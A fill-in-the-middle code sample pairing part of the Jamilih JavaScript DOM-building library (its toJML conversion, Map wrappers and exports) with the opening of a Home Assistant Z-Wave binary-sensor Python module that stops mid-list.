'$symbol': { var _attVal3 = slicedToArray(attVal, 2), symbol = _attVal3[0], func = _attVal3[1]; if (typeof func === 'function') { var funcBound = func.bind(elem); if (typeof symbol === 'string') { elem[Symbol.for(symbol)] = funcBound; } else { elem[symbol] = funcBound; } } else { var obj = func; obj.elem = elem; if (typeof symbol === 'string') { elem[Symbol.for(symbol)] = obj; } else { elem[symbol] = obj; } } break; }case '$data': { setMap(attVal); break; }case '$attribute': { // Attribute node var node = attVal.length === 3 ? doc.createAttributeNS(attVal[0], attVal[1]) : doc.createAttribute(attVal[0]); node.value = attVal[attVal.length - 1]; nodes[nodes.length] = node; break; }case '$text': { // Todo: Also allow as jml(['a text node']) (or should that become a fragment)? var _node = doc.createTextNode(attVal); nodes[nodes.length] = _node; break; }case '$document': { // Todo: Conditionally create XML document var _node2 = doc.implementation.createHTMLDocument(); if (attVal.childNodes) { attVal.childNodes.forEach(_childrenToJML(_node2)); // Remove any extra nodes created by createHTMLDocument(). var j = attVal.childNodes.length; while (_node2.childNodes[j]) { var cn = _node2.childNodes[j]; cn.parentNode.removeChild(cn); j++; } } else { if (attVal.$DOCTYPE) { var dt = { $DOCTYPE: attVal.$DOCTYPE }; var doctype = jml(dt); _node2.firstChild.replaceWith(doctype); } var html = _node2.childNodes[1]; var head = html.childNodes[0]; var _body = html.childNodes[1]; if (attVal.title || attVal.head) { var meta = doc.createElement('meta'); meta.setAttribute('charset', 'utf-8'); head.appendChild(meta); } if (attVal.title) { _node2.title = attVal.title; // Appends after meta } if (attVal.head) { attVal.head.forEach(_appendJML(head)); } if (attVal.body) { attVal.body.forEach(_appendJMLOrText(_body)); } } nodes[nodes.length] = _node2; break; }case '$DOCTYPE': { /* // Todo: if (attVal.internalSubset) { node = {}; } else */ var _node3 = void 0; if (attVal.entities || attVal.notations) { _node3 = { name: attVal.name, nodeName: attVal.name, nodeValue: null, nodeType: 10, entities: attVal.entities.map(_jmlSingleArg), notations: attVal.notations.map(_jmlSingleArg), publicId: attVal.publicId, systemId: attVal.systemId // internalSubset: // Todo }; } else { _node3 = doc.implementation.createDocumentType(attVal.name, attVal.publicId || '', attVal.systemId || ''); } nodes[nodes.length] = _node3; break; }case '$ENTITY': { /* // Todo: Should we auto-copy another node's properties/methods (like DocumentType) excluding or changing its non-entity node values? const node = { nodeName: attVal.name, nodeValue: null, publicId: attVal.publicId, systemId: attVal.systemId, notationName: attVal.notationName, nodeType: 6, childNodes: attVal.childNodes.map(_DOMfromJMLOrString) }; */ break; }case '$NOTATION': { // Todo: We could add further properties/methods, but unlikely to be used as is. var _node4 = { nodeName: attVal[0], publicID: attVal[1], systemID: attVal[2], nodeValue: null, nodeType: 12 }; nodes[nodes.length] = _node4; break; }case '$on': { // Events for (var p2 in attVal) { if (attVal.hasOwnProperty(p2)) { var val = attVal[p2]; if (typeof val === 'function') { val = [val, false]; } if (typeof val[0] === 'function') { _addEvent(elem, p2, val[0], val[1]); // element, event name, handler, capturing } } } break; }case 'className':case 'class': if (attVal != null) { elem.className = attVal; } break; case 'dataset': { var _ret2 = function () { // Map can be keyed with hyphenated or camel-cased properties var recurse = function recurse(attVal, startProp) { var prop = ''; var pastInitialProp = startProp !== ''; Object.keys(attVal).forEach(function (key) { var value = attVal[key]; if (pastInitialProp) { prop = startProp + key.replace(hyphenForCamelCase, _upperCase).replace(/^([a-z])/, _upperCase); } else { prop = startProp + key.replace(hyphenForCamelCase, _upperCase); } if (value === null || (typeof value === 'undefined' ? 'undefined' : _typeof(value)) !== 'object') { if (value != null) { elem.dataset[prop] = value; } prop = startProp; return; } recurse(value, prop); }); }; recurse(attVal, ''); return 'break'; // Todo: Disable this by default unless configuration explicitly allows (for security) }(); break; } case 'htmlFor':case 'for': if (elStr === 'label') { if (attVal != null) { elem.htmlFor = attVal; } break; } elem.setAttribute(att, attVal); break; case 'xmlns': // Already handled break; default: if (att.match(/^on/)) { elem[att] = attVal; // _addEvent(elem, att.slice(2), attVal, false); // This worked, but perhaps the user wishes only one event break; } if (att === 'style') { if (attVal == null) { break; } if ((typeof attVal === 'undefined' ? 'undefined' : _typeof(attVal)) === 'object') { for (var _p in attVal) { if (attVal.hasOwnProperty(_p) && attVal[_p] != null) { // Todo: Handle aggregate properties like "border" if (_p === 'float') { elem.style.cssFloat = attVal[_p]; elem.style.styleFloat = attVal[_p]; // Harmless though we could make conditional on older IE instead } else { elem.style[_p.replace(hyphenForCamelCase, _upperCase)] = attVal[_p]; } } } break; } // setAttribute unfortunately erases any existing styles elem.setAttribute(att, attVal); /* // The following reorders which is troublesome for serialization, e.g., as used in our testing if (elem.style.cssText !== undefined) { elem.style.cssText += attVal; } else { // Opera elem.style += attVal; } */ break; } var matchingPlugin = opts && opts.$plugins && opts.$plugins.find(function (p) { return p.name === att; }); if (matchingPlugin) { matchingPlugin.set({ element: elem, attribute: { name: att, value: attVal } }); break; } elem.setAttribute(att, attVal); break; } } } var nodes = []; var elStr = void 0; var opts = void 0; var isRoot = false; if (_getType(args[0]) === 'object' && Object.keys(args[0]).some(function (key) { return possibleOptions.includes(key); })) { opts = args[0]; if (opts.state !== 'child') { isRoot = true; opts.state = 'child'; } if (opts.$map && !opts.$map.root && opts.$map.root !== false) { opts.$map = { root: opts.$map }; } if ('$plugins' in opts) { if (!Array.isArray(opts.$plugins)) { throw new Error('$plugins must be an array'); } opts.$plugins.forEach(function (pluginObj) { if (!pluginObj) { throw new TypeError('Plugin must be an object'); } if (!pluginObj.name || !pluginObj.name.startsWith('$_')) { throw new TypeError('Plugin object name must be present and begin with `$_`'); } if (typeof pluginObj.set !== 'function') { throw new TypeError('Plugin object must have a `set` method'); } }); } args = args.slice(1); } var argc = args.length; var defaultMap = opts && opts.$map && opts.$map.root; var setMap = function setMap(dataVal) { var map = void 0, obj = void 0; // Boolean indicating use of default map and object if (dataVal === true) { var _defaultMap = slicedToArray(defaultMap, 2); map = _defaultMap[0]; obj = _defaultMap[1]; } else if (Array.isArray(dataVal)) { // Array of strings mapping to default if (typeof dataVal[0] === 'string') { dataVal.forEach(function (dVal) { setMap(opts.$map[dVal]); }); // Array of Map and non-map data object } else { map = dataVal[0] || defaultMap[0]; obj = dataVal[1] || defaultMap[1]; } // Map } else if (/^\[object (?:Weak)?Map\]$/.test([].toString.call(dataVal))) { map = dataVal; obj = defaultMap[1]; // Non-map data object } else { map = defaultMap[0]; obj = dataVal; } map.set(elem, obj); }; for (var i = 0; i < argc; i++) { var arg = args[i]; switch (_getType(arg)) { case 'null': // null always indicates a place-holder (only needed for last argument if want array returned) if (i === argc - 1) { _applyAnyStylesheet(nodes[0]); // We have to execute any stylesheets even if not appending or otherwise IE will never apply them // Todo: Fix to allow application of stylesheets of style tags within fragments? return nodes.length <= 1 ? nodes[0] : nodes.reduce(_fragReducer, doc.createDocumentFragment()); // nodes; } break; case 'string': // Strings indicate elements switch (arg) { case '!': nodes[nodes.length] = doc.createComment(args[++i]); break; case '?': arg = args[++i]; var procValue = args[++i]; var val = procValue; if ((typeof val === 'undefined' ? 'undefined' : _typeof(val)) === 'object') { procValue = []; for (var p in val) { if (val.hasOwnProperty(p)) { procValue.push(p + '=' + '"' + // https://www.w3.org/TR/xml-stylesheet/#NT-PseudoAttValue val[p].replace(/"/g, '&quot;') + '"'); } } procValue = procValue.join(' '); } // Firefox allows instructions with ">" in this method, but not if placed directly! try { nodes[nodes.length] = doc.createProcessingInstruction(arg, procValue); } catch (e) { // Getting NotSupportedError in IE, so we try to imitate a processing instruction with a comment // innerHTML didn't work // var elContainer = doc.createElement('div'); // elContainer.textContent = '<?' + doc.createTextNode(arg + ' ' + procValue).nodeValue + '?>'; // nodes[nodes.length] = elContainer.textContent; // Todo: any other way to resolve? Just use XML? nodes[nodes.length] = doc.createComment('?' + arg + ' ' + procValue + '?'); } break; // Browsers don't support doc.createEntityReference, so we just use this as a convenience case '&': nodes[nodes.length] = _createSafeReference('entity', '', args[++i]); break; case '#': // // Decimal character reference - ['#', '01234'] // &#01234; // probably easier to use JavaScript Unicode escapes nodes[nodes.length] = _createSafeReference('decimal', arg, String(args[++i])); break; case '#x': // Hex character reference - ['#x', '123a'] // &#x123a; // probably easier to use JavaScript Unicode escapes nodes[nodes.length] = _createSafeReference('hexadecimal', arg, args[++i]); break; case '![': // '![', ['escaped <&> text'] // <![CDATA[escaped <&> text]]> // CDATA valid in XML only, so we'll just treat as text for mutual compatibility // Todo: config (or detection via some kind of doc.documentType property?) of whether in XML try { nodes[nodes.length] = doc.createCDATASection(args[++i]); } catch (e2) { nodes[nodes.length] = doc.createTextNode(args[i]); // i already incremented } break; case '': nodes[nodes.length] = doc.createDocumentFragment(); break; default: { // An element elStr = arg; var _atts = args[i + 1]; // Todo: Fix this to depend on XML/config, not availability of methods if (_getType(_atts) === 'object' && _atts.is) { var is = _atts.is; if (doc.createElementNS) { elem = doc.createElementNS(NS_HTML, elStr, { is: is }); } else { elem = doc.createElement(elStr, { is: is }); } } else { if (doc.createElementNS) { elem = doc.createElementNS(NS_HTML, elStr); } else { elem = doc.createElement(elStr); } } nodes[nodes.length] = elem; // Add to parent break; } } break; case 'object': // Non-DOM-element objects indicate attribute-value pairs var atts = arg; if (atts.xmlns !== undefined) { // We handle this here, as otherwise may lose events, etc. // As namespace of element already set as XHTML, we need to change the namespace // elem.setAttribute('xmlns', atts.xmlns); // Doesn't work // Can't set namespaceURI dynamically, renameNode() is not supported, and setAttribute() doesn't work to change the namespace, so we resort to this hack var replacer = void 0; if (_typeof(atts.xmlns) === 'object') { replacer = _replaceDefiner(atts.xmlns); } else { replacer = ' xmlns="' + atts.xmlns + '"'; } // try { // Also fix DOMParser to work with text/html elem = nodes[nodes.length - 1] = new DOMParser().parseFromString(new XmlSerializer().serializeToString(elem) // Mozilla adds XHTML namespace .replace(' xmlns="' + NS_HTML + '"', replacer), 'application/xml').documentElement; // }catch(e) {alert(elem.outerHTML);throw e;} } var orderedArr = atts.$a ? atts.$a.map(_copyOrderedAtts) : [atts]; orderedArr.forEach(_checkAtts); break; case 'fragment': case 'element': /* 1) Last element always the parent (put null if don't want parent and want to return array) unless only atts and children (no other elements) 2) Individual elements (DOM elements or sequences of string[/object/array]) get added to parent first-in, first-added */ if (i === 0) { // Allow wrapping of element elem = arg; } if (i === argc - 1 || i === argc - 2 && args[i + 1] === null) { // parent var elsl = nodes.length; for (var k = 0; k < elsl; k++) { _appendNode(arg, nodes[k]); } // Todo: Apply stylesheets if any style tags were added elsewhere besides the first element? _applyAnyStylesheet(nodes[0]); // We have to execute any stylesheets even if not appending or otherwise IE will never apply them } else { nodes[nodes.length] = arg; } break; case 'array': // Arrays or arrays of arrays indicate child nodes var child = arg; var cl = child.length; for (var j = 0; j < cl; j++) { // Go through children array container to handle elements var childContent = child[j]; var childContentType = typeof childContent === 'undefined' ? 'undefined' : _typeof(childContent); if (childContent === undefined) { throw String('Parent array:' + JSON.stringify(args) + '; child: ' + child + '; index:' + j); } switch (childContentType) { // Todo: determine whether null or function should have special handling or be converted to text case 'string':case 'number':case 'boolean': _appendNode(elem, doc.createTextNode(childContent)); break; default: if (Array.isArray(childContent)) { // Arrays representing child elements _appendNode(elem, _optsOrUndefinedJML.apply(undefined, [opts].concat(toConsumableArray(childContent)))); } else if (childContent['#']) { // Fragment _appendNode(elem, _optsOrUndefinedJML(opts, childContent['#'])); } else { // Single DOM element children _appendNode(elem, childContent); } break; } } break; } } var ret = nodes[0] || elem; if (opts && isRoot && opts.$map && opts.$map.root) { setMap(true); } return ret; }; /** * Converts a DOM object or a string of HTML into a Jamilih object (or string) * @param {string|HTMLElement} [dom=document.documentElement] Defaults to converting the current document. * @param {object} [config={stringOutput:false}] Configuration object * @param {boolean} [config.stringOutput=false] Whether to output the Jamilih object as a string. * @returns {array|string} Array containing the elements which represent a Jamilih object, or, if `stringOutput` is true, it will be the stringified version of such an object */ jml.toJML = function (dom, config) { config = config || { stringOutput: false }; if (typeof dom === 'string') { dom = new DOMParser().parseFromString(dom, 'text/html'); // todo: Give option for XML once implemented and change JSDoc to allow for Element } var ret = []; var parent = ret; var parentIdx = 0; function invalidStateError() { // These are probably only necessary if working with text/html function DOMException() { return this; } { // INVALID_STATE_ERR per section 9.3 XHTML 5: http://www.w3.org/TR/html5/the-xhtml-syntax.html // Since we can't instantiate without this (at least in Mozilla), this mimicks at least (good idea?) var e = new DOMException(); e.code = 11; throw e; } } function addExternalID(obj, node) { if (node.systemId.includes('"') && node.systemId.includes("'")) { invalidStateError(); } var publicId = node.publicId; var systemId = node.systemId; if (systemId) { obj.systemId = systemId; } if (publicId) { obj.publicId = publicId; } } function set$$1(val) { parent[parentIdx] = val; parentIdx++; } function setChildren() { set$$1([]); parent = parent[parentIdx - 1]; parentIdx = 0; } function setObj(prop1, prop2) { parent = parent[parentIdx - 1][prop1]; parentIdx = 0; if (prop2) { parent = parent[prop2]; } } function parseDOM(node, namespaces) { // namespaces = clone(namespaces) || {}; // Ensure we're working with a copy, so different levels in the hierarchy can treat it differently /* if ((node.prefix && node.prefix.includes(':')) || (node.localName && node.localName.includes(':'))) { invalidStateError(); } */ var type = 'nodeType' in node ? node.nodeType : null; namespaces = Object.assign({}, namespaces); var xmlChars = /([\u0009\u000A\u000D\u0020-\uD7FF\uE000-\uFFFD]|[\uD800-\uDBFF][\uDC00-\uDFFF])*$/; // eslint-disable-line no-control-regex if ([2, 3, 4, 7, 8].includes(type) && !xmlChars.test(node.nodeValue)) { invalidStateError(); } var children = void 0, start = void 0, tmpParent = void 0, tmpParentIdx = void 0; function setTemp() { tmpParent = parent; tmpParentIdx = parentIdx; } function resetTemp() { parent = tmpParent; parentIdx = tmpParentIdx; parentIdx++; // Increment index in parent container of this element } switch (type) { case 1: // ELEMENT setTemp(); var nodeName = node.nodeName.toLowerCase(); // Todo: for XML, should not lower-case setChildren(); // Build child array since elements are, except at the top level, encapsulated in arrays set$$1(nodeName); start = {}; var hasNamespaceDeclaration = false; if (namespaces[node.prefix || ''] !== node.namespaceURI) { namespaces[node.prefix || ''] = node.namespaceURI; if (node.prefix) { start['xmlns:' + node.prefix] = node.namespaceURI; } else if (node.namespaceURI) { start.xmlns = node.namespaceURI; } hasNamespaceDeclaration = true; } if (node.attributes.length) { set$$1(Array.from(node.attributes).reduce(function (obj, att) { obj[att.name] = att.value; // Attr.nodeName and Attr.nodeValue are deprecated as of DOM4 as Attr no longer inherits from Node, so we can safely use name and value return obj; }, start)); } else if (hasNamespaceDeclaration) { set$$1(start); } children = node.childNodes; if (children.length) { setChildren(); // Element children array container Array.from(children).forEach(function (childNode) { parseDOM(childNode, namespaces); }); } resetTemp(); break; case undefined: // Treat as attribute node until this is fixed: https://github.com/tmpvar/jsdom/issues/1641 / https://github.com/tmpvar/jsdom/pull/1822 case 2: // ATTRIBUTE (should only get here if passing in an attribute node) set$$1({ $attribute: [node.namespaceURI, node.name, node.value] }); break; case 3: // TEXT if (config.stripWhitespace && /^\s+$/.test(node.nodeValue)) { return; } set$$1(node.nodeValue); break; case 4: // CDATA if (node.nodeValue.includes(']]' + '>')) { invalidStateError(); } set$$1(['![', node.nodeValue]); break; case 5: // ENTITY REFERENCE (probably not used in browsers since already resolved) set$$1(['&', node.nodeName]); break; case 6: // ENTITY (would need to pass in directly) setTemp(); start = {}; if (node.xmlEncoding || node.xmlVersion) { // an external entity file? start.$ENTITY = { name: node.nodeName, version: node.xmlVersion, encoding: node.xmlEncoding }; } else { start.$ENTITY = { name: node.nodeName }; if (node.publicId || node.systemId) { // External Entity? addExternalID(start.$ENTITY, node); if (node.notationName) { start.$ENTITY.NDATA = node.notationName; } } } set$$1(start); children = node.childNodes; if (children.length) { start.$ENTITY.childNodes = []; // Set position to $ENTITY's childNodes array children setObj('$ENTITY', 'childNodes'); Array.from(children).forEach(function (childNode) { parseDOM(childNode, namespaces); }); } resetTemp(); break; case 7: // PROCESSING INSTRUCTION if (/^xml$/i.test(node.target)) { invalidStateError(); } if (node.target.includes('?>')) { invalidStateError(); } if (node.target.includes(':')) { invalidStateError(); } if (node.data.includes('?>')) { invalidStateError(); } set$$1(['?', node.target, node.data]); // Todo: Could give option to attempt to convert value back into object if has pseudo-attributes break; case 8: // COMMENT if (node.nodeValue.includes('--') || node.nodeValue.length && node.nodeValue.lastIndexOf('-') === node.nodeValue.length - 1) { invalidStateError(); } set$$1(['!', node.nodeValue]); break; case 9: // DOCUMENT setTemp(); var docObj = { $document: { childNodes: [] } }; if (config.xmlDeclaration) { docObj.$document.xmlDeclaration = { version: doc.xmlVersion, encoding: doc.xmlEncoding, standAlone: doc.xmlStandalone }; } set$$1(docObj); // doc.implementation.createHTMLDocument // Set position to fragment's array children setObj('$document', 'childNodes'); children = node.childNodes; if (!children.length) { invalidStateError(); } // set({$xmlDocument: []}); // doc.implementation.createDocument // Todo: use this conditionally Array.from(children).forEach(function (childNode) { // Can't just do documentElement as there may be doctype, comments, etc. // No need for setChildren, as we have already built the container array parseDOM(childNode, namespaces); }); resetTemp(); break; case 10: // DOCUMENT TYPE setTemp(); // Can create directly by doc.implementation.createDocumentType start = { $DOCTYPE: { name: node.name } }; if (node.internalSubset) { start.internalSubset = node.internalSubset; } var pubIdChar = /^(\u0020|\u000D|\u000A|[a-zA-Z0-9]|[-'()+,./:=?;!*#@$_%])*$/; // eslint-disable-line no-control-regex if (!pubIdChar.test(node.publicId)) { invalidStateError(); } addExternalID(start.$DOCTYPE, node); // Fit in internal subset along with entities?: probably don't need as these would only differ if from DTD, and we're not rebuilding the DTD set$$1(start); // Auto-generate the internalSubset instead? Avoid entities/notations in favor of array to preserve order? var entities = node.entities; // Currently deprecated if (entities && entities.length) { start.$DOCTYPE.entities = []; setObj('$DOCTYPE', 'entities'); Array.from(entities).forEach(function (entity) { parseDOM(entity, namespaces); }); // Reset for notations parent = tmpParent; parentIdx = tmpParentIdx + 1; } var notations = node.notations; // Currently deprecated if (notations && notations.length) { start.$DOCTYPE.notations = []; setObj('$DOCTYPE', 'notations'); Array.from(notations).forEach(function (notation) { parseDOM(notation, namespaces); }); } resetTemp(); break; case 11: // DOCUMENT FRAGMENT setTemp(); set$$1({ '#': [] }); // Set position to fragment's array children setObj('#'); children = node.childNodes; Array.from(children).forEach(function (childNode) { // No need for setChildren, as we have already built the container array parseDOM(childNode, namespaces); }); resetTemp(); break; case 12: // NOTATION start = { $NOTATION: { name: node.nodeName } }; addExternalID(start.$NOTATION, node); set$$1(start); break; default: throw new TypeError('Not an XML type'); } } parseDOM(dom, {}); if (config.stringOutput) { return JSON.stringify(ret[0]); } return ret[0]; }; jml.toJMLString = function (dom, config) { return jml.toJML(dom, Object.assign(config || {}, { stringOutput: true })); };<|fim▁hole|> // Alias for jml() return jml.apply(undefined, arguments); }; jml.toHTML = function () { // Todo: Replace this with version of jml() that directly builds a string var ret = jml.apply(undefined, arguments); // Todo: deal with serialization of properties like 'selected', 'checked', 'value', 'defaultValue', 'for', 'dataset', 'on*', 'style'! (i.e., need to build a string ourselves) return ret.outerHTML; }; jml.toDOMString = function () { // Alias for jml.toHTML for parity with jml.toJMLString return jml.toHTML.apply(jml, arguments); }; jml.toXML = function () { var ret = jml.apply(undefined, arguments); return new XmlSerializer().serializeToString(ret); }; jml.toXMLDOMString = function () { // Alias for jml.toXML for parity with jml.toJMLString return jml.toXML.apply(jml, arguments); }; var JamilihMap = function (_Map) { inherits(JamilihMap, _Map); function JamilihMap() { classCallCheck(this, JamilihMap); return possibleConstructorReturn(this, (JamilihMap.__proto__ || Object.getPrototypeOf(JamilihMap)).apply(this, arguments)); } createClass(JamilihMap, [{ key: 'get', value: function get$$1(elem) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihMap.prototype.__proto__ || Object.getPrototypeOf(JamilihMap.prototype), 'get', this).call(this, elem); } }, { key: 'set', value: function set$$1(elem, value) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihMap.prototype.__proto__ || Object.getPrototypeOf(JamilihMap.prototype), 'set', this).call(this, elem, value); } }, { key: 'invoke', value: function invoke(elem, methodName) { var _get; elem = typeof elem === 'string' ? $(elem) : elem; for (var _len3 = arguments.length, args = Array(_len3 > 2 ? _len3 - 2 : 0), _key3 = 2; _key3 < _len3; _key3++) { args[_key3 - 2] = arguments[_key3]; } return (_get = this.get(elem))[methodName].apply(_get, [elem].concat(args)); } }]); return JamilihMap; }(Map); var JamilihWeakMap = function (_WeakMap) { inherits(JamilihWeakMap, _WeakMap); function JamilihWeakMap() { classCallCheck(this, JamilihWeakMap); return possibleConstructorReturn(this, (JamilihWeakMap.__proto__ || Object.getPrototypeOf(JamilihWeakMap)).apply(this, arguments)); } createClass(JamilihWeakMap, [{ key: 'get', value: function get$$1(elem) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihWeakMap.prototype.__proto__ || Object.getPrototypeOf(JamilihWeakMap.prototype), 'get', this).call(this, elem); } }, { key: 'set', value: function set$$1(elem, value) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihWeakMap.prototype.__proto__ || Object.getPrototypeOf(JamilihWeakMap.prototype), 'set', this).call(this, elem, value); } }, { key: 'invoke', value: function invoke(elem, methodName) { var _get2; elem = typeof elem === 'string' ? $(elem) : elem; for (var _len4 = arguments.length, args = Array(_len4 > 2 ? _len4 - 2 : 0), _key4 = 2; _key4 < _len4; _key4++) { args[_key4 - 2] = arguments[_key4]; } return (_get2 = this.get(elem))[methodName].apply(_get2, [elem].concat(args)); } }]); return JamilihWeakMap; }(WeakMap); jml.Map = JamilihMap; jml.WeakMap = JamilihWeakMap; jml.weak = function (obj) { var map = new JamilihWeakMap(); for (var _len5 = arguments.length, args = Array(_len5 > 1 ? _len5 - 1 : 0), _key5 = 1; _key5 < _len5; _key5++) { args[_key5 - 1] = arguments[_key5]; } var elem = jml.apply(undefined, [{ $map: [map, obj] }].concat(args)); return [map, elem]; }; jml.strong = function (obj) { var map = new JamilihMap(); for (var _len6 = arguments.length, args = Array(_len6 > 1 ? _len6 - 1 : 0), _key6 = 1; _key6 < _len6; _key6++) { args[_key6 - 1] = arguments[_key6]; } var elem = jml.apply(undefined, [{ $map: [map, obj] }].concat(args)); return [map, elem]; }; jml.symbol = jml.sym = jml.for = function (elem, sym) { elem = typeof elem === 'string' ? $(elem) : elem; return elem[(typeof sym === 'undefined' ? 'undefined' : _typeof(sym)) === 'symbol' ? sym : Symbol.for(sym)]; }; jml.command = function (elem, symOrMap, methodName) { elem = typeof elem === 'string' ? $(elem) : elem; var func = void 0; for (var _len7 = arguments.length, args = Array(_len7 > 3 ? _len7 - 3 : 0), _key7 = 3; _key7 < _len7; _key7++) { args[_key7 - 3] = arguments[_key7]; } if (['symbol', 'string'].includes(typeof symOrMap === 'undefined' ? 'undefined' : _typeof(symOrMap))) { var _func; func = jml.sym(elem, symOrMap); if (typeof func === 'function') { return func.apply(undefined, [methodName].concat(args)); // Already has `this` bound to `elem` } return (_func = func)[methodName].apply(_func, args); } else { var _func3; func = symOrMap.get(elem); if (typeof func === 'function') { var _func2; return (_func2 = func).call.apply(_func2, [elem, methodName].concat(args)); } return (_func3 = func)[methodName].apply(_func3, [elem].concat(args)); } // return func[methodName].call(elem, ...args); }; jml.setWindow = function (wind) { win = wind; }; jml.setDocument = function (docum) { doc = docum; if (docum && docum.body) { body = docum.body; } }; jml.setXMLSerializer = function (xmls) { XmlSerializer = xmls; }; jml.getWindow = function () { return win; }; jml.getDocument = function () { return doc; }; jml.getXMLSerializer = function () { return XmlSerializer; }; var body = doc && doc.body; var nbsp = '\xA0'; // Very commonly needed in templates export default jml; export { jml, $, $$, nbsp, body };<|fim▁end|>
jml.toDOM = function () {
<|file_name|>binary_sensor.py<|end_file_name|><|fim▁begin|>"""Representation of Z-Wave binary_sensors.""" from openzwavemqtt.const import CommandClass, ValueIndex, ValueType from homeassistant.components.binary_sensor import ( DOMAIN as BINARY_SENSOR_DOMAIN, BinarySensorDeviceClass, BinarySensorEntity, ) from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant, callback from homeassistant.helpers.dispatcher import async_dispatcher_connect from homeassistant.helpers.entity_platform import AddEntitiesCallback from .const import DATA_UNSUBSCRIBE, DOMAIN from .entity import ZWaveDeviceEntity NOTIFICATION_TYPE = "index" NOTIFICATION_VALUES = "values" NOTIFICATION_DEVICE_CLASS = "device_class" NOTIFICATION_SENSOR_ENABLED = "enabled" NOTIFICATION_OFF_VALUE = "off_value" NOTIFICATION_VALUE_CLEAR = 0 # Translation from values in Notification CC to binary sensors # https://github.com/OpenZWave/open-zwave/blob/master/config/NotificationCCTypes.xml NOTIFICATION_SENSORS = [ { # Index 1: Smoke Alarm - Value Id's 1 and 2 # Assuming here that Value 1 and 2 are not present at the same time NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SMOKE_ALARM, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SMOKE, }, { # Index 1: Smoke Alarm - All other Value Id's # Create as disabled sensors NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SMOKE_ALARM, NOTIFICATION_VALUES: [3, 4, 5, 6, 7, 8], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SMOKE, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 2: Carbon Monoxide - Value Id's 1 and 2 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_MONOOXIDE, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, }, { # Index 2: Carbon Monoxide - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_MONOOXIDE, NOTIFICATION_VALUES: [4, 5, 7], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 3: Carbon Dioxide - Value Id's 1 and 2 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_DIOXIDE, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, }, { # Index 3: Carbon Dioxide - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_DIOXIDE, NOTIFICATION_VALUES: [4, 5, 7], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 4: Heat - Value Id's 1, 2, 5, 6 (heat/underheat) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HEAT, NOTIFICATION_VALUES: [1, 2, 5, 6], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.HEAT, }, { # Index 4: Heat - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HEAT, NOTIFICATION_VALUES: [3, 4, 8, 10, 11], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.HEAT, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 5: Water - Value Id's 1, 2, 3, 4 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WATER, NOTIFICATION_VALUES: [1, 2, 3, 4], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.MOISTURE, }, { # Index 5: Water - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WATER, NOTIFICATION_VALUES: [5], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.MOISTURE, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 6: Access Control - Value Id's 1, 2, 3, 4 (Lock) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_ACCESS_CONTROL, NOTIFICATION_VALUES: [1, 2, 3, 4], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.LOCK, }, { # Index 6: Access Control - Value Id 22 (door/window open) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_ACCESS_CONTROL, NOTIFICATION_VALUES: [22], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.DOOR, NOTIFICATION_OFF_VALUE: 23, }, { # Index 7: Home Security - Value Id's 1, 2 (intrusion) # Assuming that value 1 and 2 are not present at the same time NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SAFETY, }, { # Index 7: Home Security - Value Id's 3, 4, 9 (tampering) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [3, 4, 9], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SAFETY, }, { # Index 7: Home Security - Value Id's 5, 6 (glass breakage) # Assuming that value 5 and 6 are not present at the same time NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [5, 6], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SAFETY, }, { # Index 7: Home Security - Value Id's 7, 8 (motion) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [7, 8], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.MOTION, }, { # Index 8: Power management - Values 1...9 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_POWER_MANAGEMENT, NOTIFICATION_VALUES: [1, 2, 3, 4, 5, 6, 7, 8, 9], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.POWER, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 8: Power management - Values 10...15 # Battery values (mutually exclusive) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_POWER_MANAGEMENT, NOTIFICATION_VALUES: [10, 11, 12, 13, 14, 15], NOTIFICATION_DEVICE_CLASS: 